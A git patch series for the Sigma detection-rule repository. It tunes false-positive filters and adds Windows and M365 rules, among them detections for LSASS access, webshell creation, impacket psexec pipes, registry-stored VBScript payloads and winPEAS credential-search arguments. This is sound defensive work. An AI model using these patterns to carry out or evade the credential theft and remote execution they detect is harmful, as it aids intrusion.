.../powershell_module/posh_pm_alternate_powershell_hosts.yml | 4 +++- .../proc_access_win_rare_proc_access_lsass.yml | 5 ++++- 3 files changed, 10 insertions(+), 3 deletions(-) diff --git a/rules/windows/dns_query/dns_query_win_susp_ldap.yml b/rules/windows/dns_query/dns_query_win_susp_ldap.yml index accfaf6e3..5f0998042 100644 --- a/rules/windows/dns_query/dns_query_win_susp_ldap.yml +++ b/rules/windows/dns_query/dns_query_win_susp_ldap.yml @@ -3,7 +3,7 @@ id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e description: Detect suspicious ldap request from non Windows application status: experimental date: 2022/08/20 -modified: 2022/09/08 +modified: 2022/09/18 author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md @@ -20,6 +20,8 @@ detection: Image|endswith: '\MsMpEng.exe' filter_unknown: Image: '' + filter_azure: + Image|startswith: 'C:\WindowsAzure\GuestAgent' condition: dns_request and not 1 of filter_* falsepositives: - Programs that also lookup the observed domain diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 3fc16fea8..7b7d84390 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml @@ -3,7 +3,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2022/04/21 +modified: 2022/09/18 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -25,6 +25,8 @@ detection: ContextInfo|contains: 'C:\Windows\system32\dsac.exe' filter_winrm: ContextInfo|contains: 'C:\Windows\system32\wsmprovhost.exe -Embedding' + filter_help_update: + Payload|contains: 'Update-Help' condition: selection and not 1 of filter* falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter diff --git a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml index 51c980f05..26a7bf029 100644 --- a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml +++ b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml @@ -7,7 +7,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule) author: Florian Roth date: 2022/03/13 -modified: 2022/08/13 +modified: 2022/09/18 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -92,6 +92,9 @@ detection: - '\MBAMInstallerService.exe' - '\WebEx\WebexHost.exe ' - '\Programs\Microsoft VS Code\Code.exe' + filter_xampp: + SourceImage|endswith: '\xampp-control.exe' + GrantedAccess: '0x410' condition: selection and not 1 of filter* fields: - User From 1c4a73f123cd584f0f43fff57086f0aff2693e4f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 12:56:52 +0200 Subject: [PATCH 54/96] fix: FP with PS ISE --- .../image_load/image_load_wsman_provider_image_load.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/image_load/image_load_wsman_provider_image_load.yml b/rules/windows/image_load/image_load_wsman_provider_image_load.yml index 1ce9ae1f7..846ebbbbb 100644 --- a/rules/windows/image_load/image_load_wsman_provider_image_load.yml +++ b/rules/windows/image_load/image_load_wsman_provider_image_load.yml @@ -3,7 +3,7 @@ id: ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94 description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. status: experimental date: 2020/06/24 -modified: 2022/07/18 +modified: 2022/09/18 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution @@ -55,6 +55,8 @@ detection: Image|startswith: 'C:\Windows\Temp\asgard2-agent\' filter_citrix: Image|startswith: 'C:\Program Files\Citrix\' + filter_ps_ise: + Image|endswith: '\powershell_ise.exe' svchost: Image|endswith: '\svchost.exe' commandline_null: From 17e9b5ee31390541f306777b9fb9d44835606d01 Mon Sep 17 00:00:00 2001 From: Arturo <101707527+amjcyber@users.noreply.github.com> Date: Sun, 18 Sep 2022 15:38:54 +0200 Subject: [PATCH 55/96] Update win_impacket_psexec.yml Based on recent tests, the original RelativeTargetName from this rule are not accurate. The last "t" from each selection must be deleted in order to detect the predefined impacket psexec behavior. --- rules/windows/builtin/security/win_impacket_psexec.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/security/win_impacket_psexec.yml b/rules/windows/builtin/security/win_impacket_psexec.yml index 036a3b101..ff7856880 100644 --- a/rules/windows/builtin/security/win_impacket_psexec.yml +++ b/rules/windows/builtin/security/win_impacket_psexec.yml @@ -16,9 +16,9 @@ detection: EventID: 5145 ShareName: '\\\\\*\\IPC$' # looking for the string \\*\IPC$ RelativeTargetName|contains: - - 'RemCom_stdint' - - 'RemCom_stdoutt' - - 'RemCom_stderrt' + - 'RemCom_stdin' + - 'RemCom_stdout' + - 'RemCom_stderr' condition: selection1 falsepositives: - Unknown From bf660b2de26c9f50aa7b5f4ab424d536fa2fd480 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 16:21:05 +0200 Subject: [PATCH 56/96] fix: FPs (testing, and Windows 2022 test system) --- .../win_scm_database_privileged_operation.yml | 4 ++-- ...ile_event_win_webshell_creation_detect.yml | 21 ++++++++----------- ..._win_shell_write_susp_files_extensions.yml | 3 ++- ...ion_win_ntfs_short_name_path_use_image.yml | 13 +++++++++--- ...creation_win_ntfs_short_name_use_image.yml | 6 ++++-- .../proc_creation_win_susp_gup_execution.yml | 7 ++++++- ...c_creation_win_susp_regsvr32_anomalies.yml | 4 +++- ..._creation_win_susp_schtasks_env_folder.yml | 6 ++++-- .../registry_event_susp_atbroker_change.yml | 8 +++---- .../registry_set_add_port_monitor.yml | 9 +++++++- ...gistry_set_disable_autologger_sessions.yml | 5 ++++- .../registry_set_new_network_provider.yml | 5 ++++- 12 files changed, 60 insertions(+), 31 deletions(-) diff --git a/rules/windows/builtin/security/win_scm_database_privileged_operation.yml b/rules/windows/builtin/security/win_scm_database_privileged_operation.yml index ed9b84694..7141e95ce 100644 --- a/rules/windows/builtin/security/win_scm_database_privileged_operation.yml +++ b/rules/windows/builtin/security/win_scm_database_privileged_operation.yml @@ -6,7 +6,7 @@ author: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton references: - https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html date: 2019/08/15 -modified: 2022/06/30 +modified: 2022/09/18 logsource: product: windows service: security @@ -22,7 +22,7 @@ detection: condition: selection and not filter falsepositives: - Unknown -level: high +level: medium tags: - attack.privilege_escalation - attack.t1548 diff --git a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml index eda1ef802..ba9948640 100755 --- a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml +++ b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml @@ -6,37 +6,34 @@ author: Beyu Denis, oscd.community, Tim Shelton references: - PT ESC rule and personal experience date: 2019/10/22 -modified: 2022/05/24 +modified: 2022/09/18 logsource: product: windows category: file_event detection: - selection_2: + selection_wwwroot: TargetFilename|contains: '\inetpub\wwwroot\' - selection_3: + selection_ext1: TargetFilename|contains: - '.asp' - '.ashx' - '.ph' - selection_4: + selection_static: TargetFilename|contains: - '\www\' - '\htdocs\' - '\html\' - selection_5: + selection_ext2: TargetFilename|contains: '.ph' - selection_6: - - TargetFilename|endswith: '.jsp' - - TargetFilename|contains|all: - - '\cgi-bin\' - - '.pl' false_positive1: # false positives when unpacking some executables in $TEMP TargetFilename|contains: - '\AppData\Local\Temp\' - '\Windows\Temp\' - false_positive2: + false_positive_system: Image: 'System' # fp : backup/restore from drivers - condition: not false_positive2 and ( (selection_2 and selection_3 and not false_positive1) or (selection_4 and selection_5 and not false_positive1) or (selection_6 and not false_positive1) ) + false_positive_legitimate: + TargetFilename|comntains: '\xampp' + condition: ((selection_wwwroot and selection_ext1) or (selection_static and selection_ext2)) and not 1 of false_positive* falsepositives: - Legitimate administrator or developer creating legitimate executable files in a web application folder level: high diff --git a/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml b/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml index 5eb617acc..d3a27df93 100644 --- a/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml +++ b/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml @@ -9,6 +9,7 @@ references: - Internal Research author: Nasreddine Bencherchali date: 2022/08/12 +modified: 2022/09/18 logsource: category: file_event product: windows @@ -17,7 +18,7 @@ detection: Image|endswith: - '\rundll32.exe' #- '\svchost.exe' # Might generate some FP - - '\dllhost.exe' + #- '\dllhost.exe' # Too many FPs - '\smss.exe' - '\RuntimeBroker.exe' - '\sihost.exe' diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml index dae3b3927..67657f150 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/08/22 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -20,7 +20,7 @@ detection: Image|contains: - '~1\' - '~2\' - filter: + filter1: - ParentImage: - C:\Windows\System32\Dism.exe - C:\Windows\System32\cleanmgr.exe # Spawns DismHost.exe with a shortened username (if too long) @@ -30,7 +30,14 @@ detection: - Product: 'InstallShield (R)' - Description: 'InstallShield (R) Setup Engine' - Company: 'InstallShield Software Corporation' - condition: selection and not filter + filter_installers: + - Image|contains|all: + - '\AppData\' + - '\Temp\' + - Image|endswith: + - '~1\unzip.exe' + - '~1\7zG.exe' + condition: selection and not 1 of filter* falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: high diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml index fceefa59e..4c53992f1 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/jonasLyk/status/1555914501802921984 date: 2022/08/06 -modified: 2022/08/12 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -37,9 +37,11 @@ detection: - '~2.js' - '~2.hta' filter: - ParentImage|endswith: + - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - '-installer.exe' # e.g. C:\Users\neo\Downloads\xampp-windows-x64-8.1.6-0-VS16-installer.exe + - Image|contains: '\vcredi' condition: selection and not filter falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml index a0305eede..b2d7e89af 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml @@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://twitter.com/nas_bench/status/1535322445439180803 date: 2022/06/10 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -16,7 +17,11 @@ detection: filter: Image|endswith: '\explorer.exe' CommandLine|contains: '\Notepad++\notepad++.exe' - condition: selection and not filter + filter_parent: + ParentImage|contains: '\Notepad++\updater\' + filter_null: + CommandLine: null + condition: selection and not 1 of filter* falsepositives: - Other parent binaries using GUP not currently identified level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml index c86ba586d..7cb98a4f5 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml @@ -4,7 +4,7 @@ status: experimental description: Detects various anomalies in relation to regsvr32.exe author: Florian Roth, oscd.community, Tim Shelton date: 2019/01/16 -modified: 2022/07/20 +modified: 2022/09/18 references: - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -73,6 +73,8 @@ detection: filter2: ParentImage: 'C:\Program Files\Box\Box\FS\streem.exe' CommandLine|contains: '\Program Files\Box\Box\Temp\' + filter_legitimate: + CommandLine|contains: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll ' condition: 1 of selection* and not 1 of filter* fields: - CommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml index 831dc9d60..f2bea0cd7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml @@ -10,7 +10,7 @@ tags: - attack.t1053.005 author: Florian Roth date: 2022/02/21 -modified: 2022/07/28 +modified: 2022/09/18 logsource: product: windows category: process_creation @@ -36,7 +36,9 @@ detection: - 'C:\Windows\Temp' - 'C:\Perflogs' filter_mixed: - - CommandLine|contains: 'update_task.xml' + - CommandLine|contains: + - 'update_task.xml' + - '/Create /TN TVInstallRestore /TR' - ParentCommandLine|contains: 'unattended.ini' condition: ( all of selection1* or all of selection2* ) and not 1 of filter* falsepositives: diff --git a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml index fc1844066..23cc3a56b 100644 --- a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml +++ b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml @@ -1,13 +1,13 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b -description: Detects creation/modification of Assisitive Technology applications and persistence with usage of ATs +description: Detects creation/modification of Assisitive Technology applications and persistence with usage of 'at' status: experimental author: Mateusz Wydra, oscd.community references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ date: 2020/10/13 -modified: 2021/05/24 +modified: 2022/09/18 tags: - attack.defense_evasion - attack.t1218 @@ -23,5 +23,5 @@ detection: - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' condition: selection falsepositives: - - Creation of non-default, legitimate AT. -level: high + - Creation of non-default, legitimate at usage +level: medium diff --git a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml index cb1c122ea..069f95d0f 100644 --- a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml +++ b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml @@ -5,7 +5,7 @@ description: | A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. author: frack113 date: 2021/12/30 -modified: 2022/03/26 +modified: 2022/09/18 status: experimental references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md @@ -24,6 +24,13 @@ detection: User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' + filter_leg1: + TargetObject|contains: 'Control\Print\Monitors\MONVNC\Driver' + filter_leg2: + TargetObject|contains|all: + - 'Control\Print\Environments\'' + - '\Drivers\' + - '\VNC Printer' condition: selection and not 1 of filter_* falsepositives: - Unknown diff --git a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml index 5caf99e9d..72d5abdd5 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml @@ -7,6 +7,7 @@ references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ date: 2022/08/01 +modified: 2022/09/18 logsource: category: registry_set product: windows @@ -22,7 +23,9 @@ detection: - '\Enabled' - '\Start' Details: DWORD (0x00000000) - condition: all of selection* + filter_legitimate: + Image: 'C:\Windows\system32\wevtutil.exe' + condition: all of selection* and not 1 of filter* falsepositives: - Unknown level: high diff --git a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml index 49a746ff1..b356a4de5 100644 --- a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml +++ b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml @@ -6,6 +6,7 @@ related: description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it author: Nasreddine Bencherchali date: 2022/08/23 +modified: 2022/09/18 status: experimental references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade @@ -25,7 +26,9 @@ detection: - '\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider' - '\System\CurrentControlSet\Services\RDPNP\NetworkProvider' #- '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV - condition: selection and not filter + filter_valid_procs: + Image: C:\Windows\System32\poqexec.exe + condition: selection and not 1 of filter* falsepositives: - Other legitimate network providers used and not filtred in this rule level: high From b052302ac04eeec0220a03ea7f399946c067aa56 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 16:24:07 +0200 Subject: [PATCH 57/96] fix: syntax error --- .../registry/registry_set/registry_set_add_port_monitor.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml index 069f95d0f..5b66ed84b 100644 --- a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml +++ b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml @@ -28,7 +28,7 @@ detection: TargetObject|contains: 'Control\Print\Monitors\MONVNC\Driver' filter_leg2: TargetObject|contains|all: - - 'Control\Print\Environments\'' + - 'Control\Print\Environments\' - '\Drivers\' - '\VNC Printer' condition: selection and not 1 of filter_* From 6161fb91b311694fcf0dad7c3ec13938e92b122b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 16:33:49 +0200 Subject: [PATCH 58/96] fix: typo in modifier --- .../file_event/file_event_win_webshell_creation_detect.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml index ba9948640..5d246108f 100755 --- a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml +++ b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml @@ -32,7 +32,7 @@ detection: false_positive_system: Image: 'System' # fp : backup/restore from drivers false_positive_legitimate: - TargetFilename|comntains: '\xampp' + TargetFilename|contains: '\xampp' condition: ((selection_wwwroot and selection_ext1) or (selection_static and selection_ext2)) and not 1 of false_positive* falsepositives: - Legitimate administrator or developer creating legitimate executable files in a web application folder From 2a94527714d4f7cbf7ceba6028fab3f3fa9cf55f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 19 Sep 2022 09:23:15 +0200 Subject: [PATCH 59/96] fix: FP with VBScript in registry key rule --- .../registry_set_vbs_payload_stored.yml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml index 049dc3869..935988c83 100644 --- a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml +++ b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml @@ -3,7 +3,7 @@ id: 46490193-1b22-4c29-bdd6-5bf63907216f description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group status: experimental date: 2021/03/05 -modified: 2022/03/26 +modified: 2022/09/19 author: Florian Roth references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ @@ -14,14 +14,13 @@ detection: selection: EventType: SetValue TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion' - Details|contains: - - 'vbscript' - - 'jscript' - - 'mshtml' + Details|contains: + - 'vbscript:' + - 'jscript:' + - 'mshtml,' - 'RunHTMLApplication' - 'Execute(' - 'CreateObject' - - 'RegRead' - 'window.close' filter: TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion\Run' @@ -31,8 +30,7 @@ detection: Details|contains: - '\Microsoft.NET\Primary Interop Assemblies\Microsoft.mshtml.dll' - '<\Microsoft.mshtml,fileVersion=' - - 'FL_Microsoft_mshtml_dll_____X86.' - - 'Microsoft_mshtml_dll_1_____X86.' + - '_mshtml_dll_' - '<\Microsoft.mshtml,culture=' condition: selection and not 1 of filter* falsepositives: From 633037e3ccc8dd4335f74872cffe20780c148b5c Mon Sep 17 00:00:00 2001 From: Feathers <93973834+ionsor@users.noreply.github.com> Date: Mon, 19 Sep 2022 13:19:55 +0200 Subject: [PATCH 60/96] Create microsoft365_pst_export_alert.yml (#2665) --- .../m365/microsoft365_pst_export_alert.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_pst_export_alert.yml diff --git a/rules/cloud/m365/microsoft365_pst_export_alert.yml b/rules/cloud/m365/microsoft365_pst_export_alert.yml new file mode 100644 index 000000000..a9950ae28 --- /dev/null +++ b/rules/cloud/m365/microsoft365_pst_export_alert.yml @@ -0,0 +1,23 @@ +title: PST Export Alert +id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 +status: experimental +description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content +author: 'Sorina Ionescu' +date: 2022/02/08 +references: + - https://attack.mitre.org/techniques/T1114/ +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'eDiscovery search started or exported' + status: success + condition: selection +falsepositives: + - PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored. +level: medium +tags: + - attack.collection + - attack.t1114 From a36724ffdf1baf74720fd66d3509db2ce4bf752d Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Mon, 19 Sep 2022 11:27:17 +0200 Subject: [PATCH 61/96] fix: FP found in testing environment --- .../registry_set/registry_set_disable_winevt_logging.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index 452485411..462cceb32 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -3,7 +3,7 @@ id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 description: Detects tempering with the "Enabled" registry key in order to disable windows logging of a windows event channel author: frack113, Nasreddine Bencherchali date: 2022/07/04 -modified: 2022/09/08 +modified: 2022/09/19 status: experimental references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 @@ -27,6 +27,7 @@ detection: TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' + - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-AppCompat\' filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' From 52eae2c92b29eb121e7e59ecf9158d8d956cbb04 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 20:25:18 +0200 Subject: [PATCH 62/96] new rule for winpeas tool --- ...c_creation_detect_execution_of_winPEAS.yml | 57 +++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml diff --git a/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml b/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml new file mode 100644 index 000000000..5ef086252 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml @@ -0,0 +1,57 @@ +title: Detect Execution of winPEAS +id: 98b53e78-ebaf-46f8-be06-421aafd176d9 +status: experimental +description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz +author: Georg Lauenstein +date: 2022/09/19 +references: + - https://github.com/carlospolop/PEASS-ng + - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation +tags: + - attack.privilege_escalation + - attack.t1082 + - attack.t1087 + - attack.t1046 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Image|endswith: + - '\winPEASany.exe' + - '\winPEASany_ofs.exe' + - '\winPEASx64.exe' + - '\winPEASx64_ofs.exe' + - '\winPEASx86.exe' + - '\winPEASx86_ofs.exe' + - OriginalFileName: + - 'winPEAS.exe' # always the same + selection_cmd_args: + - CommandLine|contains: + - 'domain' # Enumerate domain information + - 'systeminfo' # Search system information + - 'userinfo' # Search user information + - 'processinfo' # Search processes information + - 'serviceinfo' # Search services information + - 'applicationsinfo' # Search installed applications information + - 'networkinfo' # Search network information + - 'windowscreds' # Search windows credentials + - 'browserinfo ' # Search browser information + - 'filesinfo ' # Search generic files that can contains credentials + - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files + - 'eventsinfo' # Display interesting events information + filter_sysinfo: + - Image|endswith: + - '\systeminfo.exe' # due to option "systeminfo" via winPEAS + - OriginalFileName: + - 'sysinfo.exe' + condition: (selection_img or selection_cmd_args) and not filter_sysinfo +fields: + - Image + - User + - CommandLine + - ParentCommandLine + - CurrentDirectory +falsepositives: + - Pentesting +level: high From 44a49914190ed714da6685442af6c7b0baa92af6 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 21:00:59 +0200 Subject: [PATCH 63/96] Update and rename proc_creation_detect_execution_of_winPEAS.yml to proc_creation_win_winpeas_tool.yml --- ...cution_of_winPEAS.yml => proc_creation_win_winpeas_tool.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/windows/process_creation/{proc_creation_detect_execution_of_winPEAS.yml => proc_creation_win_winpeas_tool.yml} (98%) diff --git a/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml similarity index 98% rename from rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml rename to rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 5ef086252..d093f55aa 100644 --- a/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -1,4 +1,4 @@ -title: Detect Execution of winPEAS +title: Detect Execution of winPEAS id: 98b53e78-ebaf-46f8-be06-421aafd176d9 status: experimental description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz From d8e806cf93e82ce0dc5ea5e92e29089c68659d40 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 21:17:32 +0200 Subject: [PATCH 64/96] Update falsepositives and format --- .../proc_creation_win_winpeas_tool.yml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index d093f55aa..92378f6ca 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -24,8 +24,7 @@ detection: - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - - OriginalFileName: - - 'winPEAS.exe' # always the same + - OriginalFileName: 'winPEAS.exe' # always the same selection_cmd_args: - CommandLine|contains: - 'domain' # Enumerate domain information @@ -41,10 +40,8 @@ detection: - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - 'eventsinfo' # Display interesting events information filter_sysinfo: - - Image|endswith: - - '\systeminfo.exe' # due to option "systeminfo" via winPEAS - - OriginalFileName: - - 'sysinfo.exe' + - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS + - OriginalFileName: 'sysinfo.exe' condition: (selection_img or selection_cmd_args) and not filter_sysinfo fields: - Image @@ -53,5 +50,5 @@ fields: - ParentCommandLine - CurrentDirectory falsepositives: - - Pentesting + - Should not be any as administrators do not use this 